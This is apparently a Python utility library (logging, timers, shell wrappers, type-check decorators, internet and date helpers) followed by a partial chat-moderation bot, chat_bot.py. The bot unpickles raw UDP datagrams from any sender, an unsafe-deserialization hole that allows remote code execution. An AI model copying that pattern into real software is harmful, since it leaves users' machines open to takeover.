NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
@staticmethod
def log_info(text, color='grey_93', BG='default', style=None, add_time=True):
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
@staticmethod
def log_warning(text, color='gold_3a', BG='default', style=None, add_time=True):
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
@staticmethod
def log_error(text, color='red', BG='default', style=None, add_time=True):
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
@staticmethod
def log_critical(text, color='red_1', BG='default', style='bold', add_time=True):
NOW = _time.strftime('%H:%M:%S',_time.localtime()) if add_time else ''
globals()['style'].print(NOW, color, BG,end=' ')
globals()['style'].print(text, color, BG, style=style)
style = Style
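# Hedged usage sketch for Style (color names come from the `colored` package):
#
#     style.print('All good', color='green')
#     style.log_warning('Disk almost full')      # prefixed with the current time
#     banner = style('Hello', color='red', BG='white')
#     print(banner + ' plain text')              # style objects concatenate with str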
class Record:
'''
Use this method to record an action time in second.
Usage:
Start= record()
#Some codes here...
        finish = Start.lap()
        print(finish) ==> 0.25486741
        #Some more codes here...
        finish = Start.lap() ==> 0.4502586
        Start.laps --> [0.25486741, 0.4502586]
    Use Start.reset() to clear the recorded laps.
'''
def __init__(self):
self.__start = _time.time()
self.laps = []
def __call__(self):
return f'Laps: {self.laps}'
def __repr__(self):
return f'Laps: {self.laps}'
def lap(self, save=True, Round=15):
'''
Return time passed from creating time of self.
(Read 'record' Doc String)
If save is True, time will be added to self.laps
'''
lp = _time.time() - self.__start
lp = round(lp,Round)
if save:
self.laps.append(lp)
return lp
def reset(self, reset_start=False):
'''
This will erase self.laps
If reset_start is True, start time will reset too.
'''
self.laps = []
if reset_start:
self.__start = _time.time()
def last_lap(self, save=True):
'''
Return time passed from last lap
(If self.laps is False then from start_time)
'''
ret = (self.lap(False)-self.laps[-1]) if self.laps else self.lap(False)
if save:
self.laps.append(self.lap())
return ret
@staticmethod
def timit(code,setup,times,globals_):
'''
Run the 'code' for 'times' times and return time it needs (all, not once)
(If you need any initialization for your 'code', put it in setup arg)
'''
import timeit
return timeit.timeit(stmt=code,setup=setup,number=times,globals=globals_)
record = Record
class Terminal:
"""
Run Terminal Commands with Terminal functions
(ALL FUNCTIONS ARE STATIC METHODS)
"""
@staticmethod
def run(command:str) -> None:
'''
Execute the command in a subshell
(NO RETURN, LIVE EXECUTION, OUTPUT WILL BE PRINTED)
'''
_os.system(command)
@staticmethod
def getoutput(command:str) -> str:
'''
Return output of executing command in a shell
(RETURN STR, RETURN AFTER EXECUTING CODE)
'''
return _subprocess.getoutput(command)
terminal = Terminal
class Decorator:
class Check_Type:
"""
Function decorator for developers\n
Use this decorator to check if user gives right argument type\n
You need to annotate argument type when defining it.\n
Supported Types:
* str
* list
* set
* dict
* tuple
* User-Defined Objects
Typing Module Supported Types:
* Iterable
* Callable
            * Generator
* Container
* Any
(MORE TYPES SOON ...)
'''
sig = signature(foo)
print(str(sig))
print(str(sig.parameters['b']))
print(sig.parameters['b'].annotation)
####
sig = signature(foo)
for param in sig.parameters.values():
if (param.kind == param.KEYWORD_ONLY and
param.default is param.empty):
print('Parameter:', param.annotation)
'''
"""
auto_correct = False
def __init__(self, function):
self.function = function
def __call__(self, *args, **kwargs):
special_types = ('callable', 'iterable', 'generator','container', 'any')
i=-1
__local__= list(locals()['args'])
annots= list(self.function.__annotations__.keys())
def extra_remover(correct):
# Typing module annots check
if correct.startswith('typing.'):
correct = correct[7:].lower()
# built-in types check
elif correct.startswith('<class '):
correct = correct[8:-2]
return correct
def check_specials(TYPE, LOCAL_I):
import inspect
wrong = ''
if TYPE == 'generator':
if inspect.isgeneratorfunction(LOCAL_I) or inspect.isgenerator(LOCAL_I):
return
else:
correct = 'generator'
elif TYPE == 'callable':
if callable(LOCAL_I):
return
else:
correct = 'callable'
elif TYPE == 'iterable':
if type(LOCAL_I) in (list, tuple, set, str):
print(type(LOCAL_I))
return
else:
correct = 'iterable'
elif TYPE == 'container':
if type(LOCAL_I) in (list,set,dict,tuple):
return
else:
correct = 'container'
elif TYPE == 'any':
return
wrong = extra_remover(str(type(LOCAL_I))) if not wrong else wrong
func_name = self.function.__name__
Error= TypeError(f"'{func_name}()' argument '{ARG}' must be '{correct}' (not '{wrong}')")
raise Error
for ARG in annots:
i += 1
try:
LOCAL_I = __local__[i]
correct = str(self.function.__annotations__[ARG])
'''if correct.startswith('typing.Union'):
correct = eval(correct[12:])
if type(correct) != list:
correct = [correct]'''
correct = extra_remover(correct)
if correct in special_types:
print(type(LOCAL_I))
check_specials(correct,LOCAL_I)
# Builtins and other Libraries objects
elif not eval(correct) == type(LOCAL_I):
if Check_Type.auto_correct:
try:
__local__[i] = eval(correct)(LOCAL_I)
continue
except ValueError:
pass
wrong = extra_remover(str(type(LOCAL_I)))
#correct = str(self.function.__annotations__[ARG])#[8:-2]
correct = extra_remover(correct)
func_name = self.function.__name__
Error= TypeError(f"'{func_name}()' argument '{ARG}' must be '{correct}' (not '{wrong}')")
raise Error
except (ValueError,IndexError):
pass#raise
except NameError:
raise
return self.function(*__local__, **kwargs)
decorator_all:Callable = None
@staticmethod
def attach_to_all(cls):
import inspect
for name, method in inspect.getmembers(cls):
if (not inspect.ismethod(method) and
not inspect.isfunction(method) ) or (
inspect.isbuiltin(method)):
continue
#print("Decorating function %s" % name)
setattr(cls, name, Decorator.decorator_all(method))
return cls
abstractmethod = _abc.abstractmethod
_registered_functions = {} #:Dict[str, Any]
class _MultiMethod(object):
def __init__(self, name):
self.name = name
self.typemap = {}
def __call__(self, *args):
types = tuple(arg.__class__ for arg in args)
function = self.typemap.get(types)
if function is None:
raise TypeError("no match: ",types)
return function(*args)
def register(self, types, function):
self.typemap[types] = function
def overload(*types):
def register(function):
name = function.__name__
mm = decorator._registered_functions.get(name)
if mm is None:
mm = decorator._registered_functions[name] = Decorator._MultiMethod(name)
mm.register(types, function)
return mm
return register
decorator = Decorator
Check_Type = Decorator.Check_Type
overload = Decorator.overload
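# Hedged usage sketch for the decorators (the functions below are made up):
#
#     @Check_Type
#     def greet(name: str, times: int):
#         return name * times
#
#     greet(5, 'x')   # raises TypeError: 'greet()' argument 'name' must be 'str' (not 'int')
#
#     @overload(int, int)
#     def add(a, b): return a + b
#     @overload(str, str)
#     def add(a, b): return f'{a} {b}'
#
#     add(1, 2)       # -> 3
#     add('a', 'b')   # -> 'a b'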
class IO:
@staticmethod
def wait_for_input(prompt,SS:list=[]):
answer= ''
try:
while not answer:
answer = input(prompt).strip()
except (EOFError,KeyboardInterrupt):
style.print('EXITING...','red')
exit()
return answer
@staticmethod
def selective_input(prompt,choices,default=None,ignore_case=False,error=True,invalid='Invalid input'):
        if type(choices) == dict:
            Choices = list(choices.keys())+list(choices.values())
        else:
            Choices = list(choices)
if ignore_case:
Choices = [item.lower() for item in Choices]
while True:
inp = input(prompt)
inp = inp.lower() if ignore_case else inp
if not inp or inp not in Choices:
if error:
style.print(invalid, 'red')
else:
if default:
inp = default
break
else:
break
if type(choices) == dict:
try:
inp = choices[inp]
except KeyError:
pass
return inp
@staticmethod
def yesno_input(prompt,default=None):
error= not bool(default)
        return io.selective_input(prompt,['y','yes','n','no'],default,error=error)
@staticmethod
def Input(prompt:str ='', default_value:str =''):
'''
Make Default Value For Your Input!
(THIS ONLY WORK ON WINDOWS (SORRY))
prompt is what you want and it's input(prompt) .
default_value is what there should be after prompt.
E.g:
>>> Input('Is rx7 Library Easy to Learn? ', 'Yes')
Is rx7 Library Easy to Learn? Yes
'''
import win32console
_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)
keys = []
for c in str(default_value):
evt = win32console.PyINPUT_RECORDType(win32console.KEY_EVENT)
evt.Char = c
evt.RepeatCount = 1
evt.KeyDown = True
keys.append(evt)
_stdin.WriteConsoleInput(keys)
return input(str(prompt))
@staticmethod
def getpass(prompt):
'''
Prompt for a password, with echo turned off.
'''
import getpass as Getpass
return Getpass.getpass(prompt=prompt)
io = IO
Input = default_input = io.Input
getpass = password_input = io.getpass
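# Hedged usage sketch for the IO helpers (prompts and choices are examples):
#
#     answer = io.yesno_input('Continue? [y/n] ', default='y')
#     color = io.selective_input('Pick a color: ', ['red', 'green', 'blue'])
#     secret = getpass('Token: ')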
class Tuple:
'''
(Note That This is tuple of RX7 Module So it Has More Features!)\n
(This is Not Built-in immutable sequence.)\n
If no argument is given, the constructor returns an empty tuple.\n
There is *var argumant that you can add object as much as you need.\n
Any Built-in object is accepted. (Not tested on third-party objects.)\n
Beside built-in features of tuple, this supports:
+ You Can Add objects to your tuple now.
+ Also You Can Delete Them.
+ Replace Them.
+ Like lists, Tuple supports item assigning. ( tpl[2]='hello' )
(Tuple Unpacking is Supported.)
'''
#############################
def __init__(self,*var: Any, one_item=False):
if not one_item:
self.__content= tuple(var)
else:
self.__content=[]
for item in var:
for member in item:
self.__content.append(member)
self.__content= tuple(self.__content)
def __str__(self):
return str(self.__content)
def __repr__(self):
return str(self.__content)
#############################
#############################
def add(self,*var: Any):
'''
This will add var(s) to self.
'''
self.__content= tuple(list(self.__content)+[v for v in var])
#force= lambda tpl,*var: tuple(list(tpl)+[v for v in var])
force= add
def remove(self,*var: Any):
'''
It will remove var(s) from self.
'''
#lstv= [v for v in var if v in tpl]
lstt= list(self.__content)
for th in [v for v in var if v in self.__content]:
lstt.remove(th)
self.__content= tuple(lstt)
erase= remove
    def pop(self,index=-1):
        '''Remove the item at index and return the resulting tuple.'''
        self.__content = pop(self.__content, index)
        return self.__content
#############################
#############################
def replace(self, ind: Union[int,Any], var: Any):
'''
Replace self[ind] with var.
'''
tpl=list(self.__content)
if type(ind) == str:
ind= tpl.index(ind)
tpl[ind]=var
self.__content= tuple(tpl)
def __setitem__(self,index,value,replace=False):
if not replace:
tpl=list(self.__content)
            if type(index) == str:
                index= tpl.index(index)
            tpl.insert(index,value)
self.__content= tuple(tpl)
else:
self.replace(index,value)
def __getitem__(self,index):
return self.__content[index]
#############################
def __add__(self,other):
return self.__content + other
def __contains__(self,var):
return var in self.__content
#############################
#############################
def __bool__(self):
return bool(len(self.__content))
def __hash__(self):
return hash(self.__content)
def __len__(self):
return len(self.__content)
#############################
#############################
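# Hedged usage sketch for the Tuple wrapper (values are illustrative):
#
#     tpl = Tuple(1, 2, 3)
#     tpl.add('four')         # tpl now holds (1, 2, 3, 'four')
#     tpl.replace(0, 'one')   # tpl now holds ('one', 2, 3, 'four')
#     tpl.remove(2)           # tpl now holds ('one', 3, 'four')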
_ReqConErr = _requests.exceptions.ConnectionError
class Internet:
@staticmethod
def is_connected(website='http://x.com/'):
'''
        Check for an internet connection by trying to connect to a web-site.
        (Maybe you want to know why http://x.com/ is the default web-site:
        there is almost no extra content to load
        (compare the x.com and google.com html source code),
        which makes the check a lot faster.)
'''
try:
_urllib.request.urlopen(website)
return True
except:
return False
def connection_checker(func):
"""Decaorator Which Checks Internet Connection before calling a function
Parameters
----------
func : Function
function which you are going to check if
there is internet connection before call it
"""
def inside(*args,**kwargs):
if not internet.is_connected():
raise ConnectionError('No internet connection') from None
return func(*args,**kwargs)
return inside
@staticmethod
def ip_global() -> str:
"""
Return your global ip by http://ipinfo.io/ip api.
"""
new_session = _requests.session()
response = new_session.get("http://ipinfo.io/ip")
ip_list = _re.findall(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", response.text)
new_session.close()
return ip_list[0]
@staticmethod
def ip_local() -> str:
"""
Return local ip of computer in windows by _socket. module
and in linux with hostname command in shell.
"""
#return [l for l in ([ip for ip in _socket.gethostbyname_ex(_socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [_socket._socket.(_socket.AF_INET, _socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
'''
s = _socket._socket.(_socket.AF_INET, _socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
'''
import platform
class NetworkError(Exception):
def __init__(self, message): super().__init__(message)
try:
ip = _socket.gethostbyname(_socket.gethostname())
if ip and ip not in ("127.0.1.1","127.0.0.1"):
return ip
elif platform.system() != "Windows":
command = _subprocess.Popen(["hostname", "-I"],stdout=_subprocess.PIPE,stderr=_subprocess.PIPE,stdin=_subprocess.PIPE,shell=False)
response = list(command.communicate())
if len(response[0]) > 0:
return str(response[0])[2:-4]
raise NetworkError('No Network Connection')
raise NetworkError('No Network Connection')
except:
raise
@staticmethod
def url_exists(URL) -> bool:
'''
check if url exists (with 'requests' module)
(NEED HTTP[S])
'''
try:
request = _requests.get(URL)
except _ReqConErr:
raise ConnectionError('No internet connection') from None
#print(response.status_code < 400)
if request.status_code == 200:
return True
else:
return False
@staticmethod
def ip_website(URL) -> str:
'''
get IP address of Web Site\n
(Without http[s])
'''
try:
return _socket.gethostbyname(URL)
except _socket.gaierror:
if internet.is_connected():
class NotExistsError(Exception):
def __init__(self):
super().__init__('URL Does Not Exists')
raise NotExistsError from None
else:
raise ConnectionError from None
@staticmethod
def url_links(URL) -> list:
'''
Get all links that are used in a specifiec url
(All "a" tags from html source)
(Needs 'http[s]')
''' #html.parser
try:
soup= BeautifulSoup(_requests.get(URL).text,features="lxml")
LINKS= []
for link in soup.find_all('a'):
LINKS.append(link.get('href'))
return LINKS
except _ReqConErr:
raise ConnectionError('No internet connection') from None
@staticmethod
def find_urls(string) -> list:
'''
find all urls in a string and returns list of them
(urls should start with http[s])
'''
        url = _re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', string)
return url
@staticmethod
def is_url(URL) -> bool:
'''
check if a string is url (WITH HTTP[S])
'''
        search= _re.search(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', URL)
'(http[s]?://)?([Ww]{3}\.)?(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
if search and len(search.group())==len(URL):
return True
else:
return False
@staticmethod
def open_browser(url,new_tab=True):
import webbrowser
if new_tab:
webbrowser.open_new_tab(url)
else:
webbrowser.open(url)
"""
@staticmethod
def whois(URL):
'''
return whois lookup of a website
(WITHOUT HTTPS)
'''
try:
import whois
WHO = whois.query(URL)
WHOIS = WHO.dict
return {i:WHOIS[i] for i in WHOIS}
except _socket.gaierror:
raise ConnectionError('No internet connection') from None
"""
internet = Internet
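# A minimal usage sketch of the Internet helpers above (illustrative only; the
# calls that reach the network of course require an active connection):
#
#     internet.is_url('https://example.com')         # True
#     internet.find_urls('see https://example.com')  # ['https://example.com']
#     internet.ip_website('example.com')             # e.g. '93.184.216.34'
#     internet.ip_global()                           # your public IP as a string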
class DateTime:
_NOW= 0
_NOW_YEAR= 0
_NOW_MONTH= 0
_NOW_DAY= 0
_NOW_HOUR= -1
_NOW_MINUTE= -1
_NOW_SECOND= -1
def NOW():
_NOW= _time.localtime()
_NOW_YEAR= _NOW.tm_year
_NOW_MONTH= _NOW.tm_mon
_NOW_DAY= _NOW.tm_mday
_NOW_HOUR= _NOW.tm_hour
_NOW_MINUTE= _NOW.tm_min
_NOW_SECOND= _NOW.tm_sec
return _datetime.datetime(_NOW_YEAR,_NOW_MONTH,_NOW_DAY,_NOW_HOUR,_NOW_MINUTE,_NOW_SECOND)
now = NOW
def normalize(date=[],time=[]):
now = date_time.NOW()
try:
if not date[0]: date[0]= now.year
if type(date[1]) == str:
try:
date[1]= date_time.month_dic[date[1].lower()]
except KeyError:
raise ValueError("Wrong Month Name") from None
if not date[1]: date[1]= now.month
if not date[2]: date[2]= now.day
except IndexError:
pass
try:
if time[0]<0: time[0]= now.hour
if time[1]<0: time[1]= now.minute
if time[2]<0: time[2]= now.second
except IndexError:
pass
return [date,time]
Weekday_Names= ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
month_lst= ['january','february','march','april','may','june',
'july','august','september','october','november','december']
month_dic= {month: month_nom for month_nom, month in enumerate(month_lst, start=1)}  # month name -> month number (1-12)
def __init__(self,year=_NOW_YEAR,month=_NOW_MONTH,day=_NOW_DAY,hour=_NOW_HOUR,minute=_NOW_MINUTE,second=_NOW_SECOND,first_week_day=0):
'''
.: Working With Date and Time :.
- Include Both Static Methods and Class Methods
- Get NOW Time
- Show in Calendar
- Next and Previous Months in Calendar
- Determine Time Passed From Specific Date
- Calendar Supports Setting First Day of the Week
'''
"""
Now = date_time.NOW()
if not year : year=Now.year
if not month: month=Now.month
if not day : day=Now.day
if hour<0 : hour=Now.hour
if minute<0 : minute=Now.minute
if second<0 : second=Now.second
"""
_norm = date_time.normalize([year,month,day],[hour,minute,second])
year,month,day = _norm[0]
hour,minute,second = _norm[1]
if type(month)==str:
try:
month= date_time.month_dic[month.lower()]
except KeyError:
raise ValueError("Wrong Month Name") from None
self.date= _datetime.date(year,month,day)
self.year=year; self.month=month; self.day=day
self.time= (hour,minute,second)
self.hour=hour; self.minute=minute; self.second=second
self.weekday= date_time.get_weekday(self.year,self.month,self.day)
self.weekday_name= date_time.get_weekday(self.year,self.month,self.day,True)
self.week_nom= date_time.get_weeknom(self.year,self.month,self.day)
#self.first_week_day= first_week_day
_calendar.setfirstweekday(first_week_day)
self.calendar= str(_calendar.month(year, month)).replace(str(day),style(str(day),'green').content)
self.calendar_month= str(_calendar.month(year, month))
self.calendar_year_all=str(_calendar.calendar(year))
self.calendar_year= [_calendar.month(year,i) for i in range(1,13)]
self.calendar_next_all= [_calendar.month(year,i) for i in range(self.month+1,13)]
self.calendar_prev_all= [_calendar.month(year,i) for i in range(1,self.month)]
self.calendar_position_next_year= str(_calendar.month(year+1, month)).replace(str(day),style(str(day),'green').content)
self.calendar_position_prev_year= str(_calendar.month(year-1, month)).replace(str(day),style(str(day),'green').content)
def setfirstweekday(self,day):
if type(day)==int and day<7:
date_time.Weekday_Names= date_time.Weekday_Names[day:]+date_time.Weekday_Names[:day]
elif type(day)==str:
day= date_time.Weekday_Names.index(day)
date_time.Weekday_Names= date_time.Weekday_Names[day:]+date_time.Weekday_Names[:day]
else:
if type(day)==int:
raise ValueError('Invalid number. Day number should be in range(7)')
else:
raise TypeError(f"Inappropriate Type For 'day'. day can be 'str' or 'int' not {type(day)}")
_calendar.setfirstweekday(day)
self.calendar= str(_calendar.month(self.year, self.month)).replace(str(self.day),style(str(self.day),'green').content)  # highlight the instance's day of month, not the weekday index
self.calendar_month= str(_calendar.month(self.year, self.month))
self.calendar_year_all=str(_calendar.calendar(self.year))
self.calendar_year= [_calendar.month(self.year,i) for i in range(1,13)]
self.calendar_next_all= [_calendar.month(self.year,i) for i in range(self.month+1,13)]
self.calendar_prev_all= [_calendar.month(self.year,i) for i in range(1,self.month)]
self.calendar_position_next_year= str(_calendar.month(self.year+1, self.month)).replace(str(self.day),style(str(self.day),'green').content)
self.calendar_position_prev_year= str(_calendar.month(self.year-1, self.month)).replace(str(self.day),style(str(self.day),'green').content)
self.weekday= date_time.get_weekday(self.year,self.month,self.day)
self.weekday_name= date_time.get_weekday(self.year,self.month,self.day,True)
self.week_nom= date_time.get_weeknom(self.year,self.month,self.day)
@staticmethod
def today():
dt = date_time.NOW()
return (dt.year,dt.month,dt.day)
@staticmethod
def calender_year(year=_NOW_YEAR):
if not year: year=date_time.NOW().year
return [_calendar.month(year,i) for i in range(1,13)]
@staticmethod
def calendar_month_st(month=_NOW_MONTH,year=_NOW_YEAR,day=0):
year,month = date_time.normalize([year,month])[0]
if not day:
return str(_calendar.month(year, month))
else:
return str(_calendar.month(year, month)).replace(str(day),style(str(day),'green').content)
@staticmethod
def passed_date(f_date,l_date=_NOW,return_time='day'):
if not l_date: l_date=date_time.NOW()
f_date = _datetime.datetime(*f_date)
return_time= return_time.lower()
if return_time in ('day','month','year','hour','minute','second'):
DELTA= l_date - f_date
if return_time == 'year':
try:
_return = _re.search(r'(?P<X>(-)?\w+) day',str(DELTA/365)).group('X')
except:
_return = None
#_return = str(DELTA/365)
elif return_time == 'month':
_return = _re.search(r'\w+',str(DELTA/30)).group()
elif return_time == 'day':
_return = str(DELTA)[:-14]
elif return_time =='hour':
_return = str(DELTA*24)[:-14]
elif return_time == 'minute':
_return = str(DELTA*1440)[:-14]
elif return_time == 'second':
_return = str(DELTA*86400)[:-14]  # 86400 seconds per day, so the days field of the scaled delta equals total seconds
if _return: return _return
else: return 0
else:
raise ValueError("return_time should be in ('year', 'month', 'day', 'hour', 'minute', 'second')")
passed_time = passed_date
'''@staticmethod
def passed_time(year=1970,month=1,day=1,hour=0,minute=0,second=0,return_time='second'):
pass'''
@staticmethod
def convert_epoch_to_local(second=None):
    # None means "now" (time.ctime defaults to the current time); a default of
    # _time.time() would be evaluated only once, at import time
    return _time.ctime(second)
@staticmethod
def get_weekday(year=_NOW_YEAR,month=_NOW_MONTH,day=_NOW_DAY,return_name=False):
"""
Weekday numbers start from 0, with Monday as day 0.
"""
year,month,day = date_time.normalize([year,month,day])[0]
if return_name:
return date_time.Weekday_Names[_datetime.date(year,month,day).weekday()]
else:
return _datetime.date(year,month,day).weekday()
@staticmethod
def get_weeknom(year=_NOW_YEAR,month=_NOW_MONTH,day=_NOW_DAY):
"""
Returns the ISO week number (may be 52 or 53 when the first days of January still belong to the previous year's last ISO week).
"""
year,month,day = date_time.normalize([year,month,day])[0]
return _datetime.date(year,month,day).isocalendar()[1]
@staticmethod
def calendar_show_week(week_nom,year=_NOW_YEAR):
year = date_time.normalize([year])[0][0]
week= week_nom
for i in list(range(1,8))[::-1]:
if date_time.get_weeknom(year,1,i)==1:
FIRST_WEEK_DAYS= len(list(range(i)))
break
day= (week-1)*7 - (6-FIRST_WEEK_DAYS)
mnth= 1
true=False
while not true:
try:
if _calendar.monthrange(year,mnth)[1]<day:
    day-= _calendar.monthrange(year,mnth)[1]  # subtract the current month's length before moving to the next month
    mnth+=1
else:
true= True
except _calendar.IllegalMonthError:
class BadWeekNumber(Exception):
def __init__(self, message='Week Number is Higher Than Year Weeks.'): super().__init__(message)
raise BadWeekNumber from None
new= date_time(year,mnth,day)
cal= new.calendar_month.splitlines()
for item in cal:
if str(new.day) in item and item != cal[0]:
INDEX= cal.index(item);COLORED_WEEK= style(item,'green');break
WEEK_WITH_COLOR= '\n'.join(cal[:INDEX]+[str(COLORED_WEEK)]+cal[INDEX+1:])
return WEEK_WITH_COLOR
@staticmethod
def get_year():
return _time.localtime().tm_year
@staticmethod
def get_month():
return _time.localtime().tm_mon
@staticmethod
def get_day_of_month():
return _time.localtime().tm_mday
@staticmethod
def get_day_of_week():
return _time.localtime().tm_wday
@staticmethod
def get_day_of_year():
return _time.localtime().tm_yday
@staticmethod
def get_hour():
return _time.localtime().tm_hour
@staticmethod
def get_minute():
return _time.localtime().tm_min
@staticmethod
def get_second():
return _time.localtime().tm_sec
date_time = DateTime
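# A minimal usage sketch of DateTime (values below are illustrative):
#
#     dt = date_time(2020, 'march', 14)      # month names are accepted as well as numbers
#     dt.weekday_name                        # e.g. 'Saturday'
#     print(dt.calendar)                     # month calendar with the day highlighted
#     date_time.passed_date((2020, 1, 1), return_time='day')   # days elapsed since 2020-01-01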
_Auto = 0
class _Lang:
class Constant:
def __new__(cls,*args,array=True):
cls._init = False
return super(_Lang.Constant, cls).__new__(cls)
def __init__(self,*args,array=True):
'''
if array:
self.__members = args
else:
if len(args) > 1:
raise ValueError
self.__members = args[0]
'''
self.__members = args
self._init = True
def __str__(self):
#if len(self.__members) > 1:
return '<'+str(self.__members)[1:-1]+'>' #‹›
#return self.__members
def __repr__(self):
return '<'+str(self.__members)[1:-1]+'>'
def __setattr__(self,_attr,value):
if self._init:
raise AttributeError(f"'Constant' object does not support item assignment")
else:
super(_Lang.Constant,self).__setattr__(_attr,value)
def __getitem__(self,index):
return self.__members[index]
def __contains__(self,obj):
return obj in self.__members
def __bool__(self):
return bool(len(self.__members))
#'''
def __hash__(self):
return hash(tuple(['Constant',len(self)]+list(self.__members)))
#'''
def __len__(self):
#if type(self.__members) == tuple:
return len(self.__members)
def _dict_getter(self):
raise AttributeError("Conatant object has no attribute '__dict__'")
#return {}
__dict__ = property(_dict_getter)
def __dir__(self):
ret = list(super().__dir__())#[:-2]
ret.remove('_init')
ret.remove('_dict_getter')
return ret
const = Const = constant = Constant
class Array:
# Sized Array
__Type_Error = "Array of type '{}' does not accept object with type '{}'"
def __init__(self,*args,type_=_Auto,size=_Auto):
self.__members = []
if type_:
self.__TYPE = type_
else:
self.__TYPE = type(args[0])
self.__TYPE_NAME = self.__TYPE.__name__
if size:
self.__SIZE = size
else:
self.__SIZE = len(args)
for obj in args:
if type(obj) == self.__TYPE:
self.__members.append(obj)
else:
raise ValueError(_Lang.Array.__Type_Error.format(self.__TYPE_NAME,type(obj).__name__))
def __str__(self):
return '{'+str(self.__members)[1:-1]+'}' #‹›
def __repr__(self):
return '{'+str(self.__members)[1:-1]+'}'
def __getitem__(self,index):
return self.__members[index]
def __contains__(self,obj):
return obj in self.__members
def __bool__(self):
return bool(len(self.__members))
def __len__(self):
return len(self.__members)
def __setitem__(self,index,obj):
if type(obj) == self.__TYPE:
self.__members[index] = obj  # assign in place; insert() would grow the array
return
raise ValueError(_Lang.Array.__Type_Error.format(self.__TYPE_NAME,type(obj).__name__))
def insert(self,index,obj):
if type(obj) == self.__TYPE:
self.__members.insert(index,obj)
return
raise ValueError(_Lang.Array.__Type_Error.format(self.__TYPE_NAME,type(obj).__name__))
def append(self,obj):
if type(obj) == self.__TYPE:
self.__members.append(obj)
return
raise ValueError(_Lang.Array.__Type_Error.format(self.__TYPE_NAME,type(obj).__name__))
add = append
def remove(self,obj):
self.__members.remove(obj)
def pop(self,index=-1):
self.__members.pop(index)
array = Array
class Types:
Str = str
Int = int
Float = float
Set = set
Tuple = tuple
Dict = dict
List = list
Bool = bool
Bytes = bytes
Class = type
Type = type
Object = object
Lambda = type(lambda: None)
Function = Lambda #type(lambda: None)
#Constant = type(_Lang.Constant(1))
#Array = type(_Lang.Array(1,1))
Any = type#_typing.Any
Callable = _typing.Callable
Container = _typing.Container
Generator = Lambda #type(_f) #Not Built-in(s) #_types.GeneratorType || _typing.Generator
Iterable = _typing.Iterable
Iterator = _typing.Iterator
NoReturn = _typing.NoReturn
Optional = _typing.Optional
BuiltinFunction = type(len)
BuiltinMethod = type([].append)
Module = type(_typing)
Method = type(globals()['Tuple']().force)
#Mapping = _typing.Mapping
#OrderedDict = _typing.OrderedDict
#Text = str
#Union = _typing.Union
#_types.AsyncGeneratorType
types = Types
#setattr(_Lang,'Const',type(_Lang.Constant(1)))
#setattr(_Lang,'Array',type(_Lang.Array(1,1)))
#END
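# A minimal usage sketch of the _Lang helpers above (illustrative only):
#
#     c = _Lang.Constant(1, 2, 3)   # immutable container; c[0] == 1, attribute assignment raises AttributeError
#     a = _Lang.Array(1, 2, 3)      # typed array of int; a.append(4) is fine
#     a.append('x')                 # raises ValueError because the element type is wrong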
|
chat_bot.py
|
import socket
import pickle
import time
from threading import Thread
from Crypto.Hash import SHA1
from pythonping import ping
class Bot:
def __init__(self, port, options=None, botName=None):
self.addr = ''
self.port = int(port)
self.udpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.udpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.badWords = ['ass', 'asshole', 'shit', 'fuck', 'dick', 'bastard', 'retard', 'whore']
self.user = botName
self.options = []
self.warnCount = []
self.messageTracker = []
self.found = False
hashed = SHA1.new()
hashed.update(self.user.encode('utf-8'))
for option in options:
self.options.append(int(option))
print(f"{self.user}'s Configuration:")
print("Token:", hashed.hexdigest())
print("Permissions enabled:", options)
print("Status: ready")
def receive(self):
while True:
data, address = self.udpSocket.recvfrom(1024)
deserialized_data = pickle.loads(data)
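# Each datagram is a pickled dict of the form {'hash': <SHA1 hex digest>, 'message': '<sender-prefix> text'};
# only the 'message' field is inspected below.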
self.found = False
for i in range(len(self.warnCount)):
if self.found:
break
elif self.warnCount[i][0] == address[0]:
self.found = True
break
if not self.found:
self.warnCount.append([address[0], 0])
for word in deserialized_data['message'].split(' '):
if deserialized_data['message'].split(' ')[0] == f'>{self.user}':
break
elif deserialized_data['message'][-6:] == 'joined' and 1 in self.options:
hashed = SHA1.new()
msg = 'Welcome to the channel!'
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
self.messageTracker.append([address, time.perf_counter()])
break
elif word in self.badWords and 2 in self.options:
hashed = SHA1.new()
msg = "You cant say that here!"
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
if 3 in self.options:
for i in range(len(self.warnCount)):
if address[0] in self.warnCount[i]:
self.warnCount[i][1] += 1
if self.warnCount[i][1] >= 3:
hashed = SHA1.new()
msg = "You have been banned from the server"
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
